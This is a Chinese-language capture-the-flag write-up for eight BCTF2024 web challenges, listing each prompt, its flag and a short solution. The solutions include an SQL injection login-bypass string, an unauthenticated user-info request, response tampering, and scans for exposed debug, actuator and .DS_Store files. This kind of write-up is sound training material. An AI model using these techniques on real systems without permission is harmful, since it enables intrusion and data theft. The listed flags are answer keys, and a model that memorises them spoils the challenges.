# BCTF2024-WEB-01~08

# 万能密码

题目

小明是一个运维工程师,他竟然忘记了管理台的密码,看着系统登录框,他陷入了沉思

www.example.com

答案

flag{9b29c64d7d5c05103510474792e59a67}

题解
sql 注入
密码输入 `1' or '1'='1`

# 未授权访问

题目

小明是一个研发工程师,有一次他接到一个需求,负责为 http://example.com:8080/ 管理平台添加一个接口,写个接口的事,实现功能逻辑很简单,但不要忘了安全授权

答案

flag{ac07a1308c5580fbbe57c16afdad1ae3}

题解

js 代码中有一段这个

, Y = () => D({
    url: "http://" + window.location.host + "/api/userinfo?id=" + t.toString(),
    method: "get"
})

请求 http://example.com/api/userinfo?id=0

# 前端认证

题目

小明是一个运维工程师,他竟然忘记了管理台 http://example.com/#/login 的密码,看着系统登录框,他又陷入了沉思

答案

flag{4bfc0fb4b27629d86daa293e61657294}

题解

劫持前端将 返回 code 改为 “0” 即可

# github

题目

小雅是一个研发工程师,有一天他接到了一个 bctf2024 的一个游戏项目,由于项目紧迫,他想回家后继续努力工作,多么勤劳的程序猿啊,然而他习惯性的登录了 github

答案

flag{03321386129b425e2c190baf810f8e44}

题解

通过搜索 BCTF2024,找到仓库,再 commit 中记录有 flag

# 线上调试信息

题目

小韩是一个研发工程师,一天他在解决一个线上 http://example.com/#/login bug,于是开启了调试信息,上线后,忘了关了。。。。。

答案

flag{1101748de24f770b3ea3fe92af73450b}

题解
# 扫url
wscan --log-level=debug ws  --plug=dirscan --basic-crawler http://example.com:8080/ --html-output=./wscan_scan_result.html

# 发现 http://example.com/debug/pprof/
# http://example.com/debug/pprof/cmdline?debug=1

# 不安全配置

题目

小丁是一个研发工程师,一天他为了 http://example.com:8080/#/login 监控服务方便,他配置了 actuator

答案

flag{75b8eecf3ff828a958d20b03c8077ddc}

题解
# 扫一下url
wscan --log-level=debug ws  --plug=dirscan --basic-crawler http://example.com/api/ --html-output=./wscan_scan_result_api.html

找到 /api/actuator
heapdump 用 idea 打开,有 flag

# 不可以爬取的路径

题目

小夏上线了他的网站 http://example.com/#/login

答案

flag{aa2646a667ee1cd83235786dccef4a26}

题解
http://example.com/robots.txt
User-agent: *
Disallow: flag_1s_3ere

http://example.com/flag_1s_3ere

# 线上备份

题目

小 S 是一个运维工程师,一天他接到业务需求,进行线上 http://example.com/#/login 代码备份,然后就悲剧了

答案

flag{93ac40e0ceda197913f46d78c9d4715b}

题解
# 扫一下
wscan --log-level=debug ws  --plug=dirscan --basic-crawler http://example.com/ --html-output=./wscan_scan_result.html

有个 .DS_Store 文件
ttps://github.com/lijiejie/ds_store_exp 用这个打开
python3 ds_store_exp.py http://example.com/.DS_Store

找到目录
http://example.com/assets.zip

打开有个 flag

-->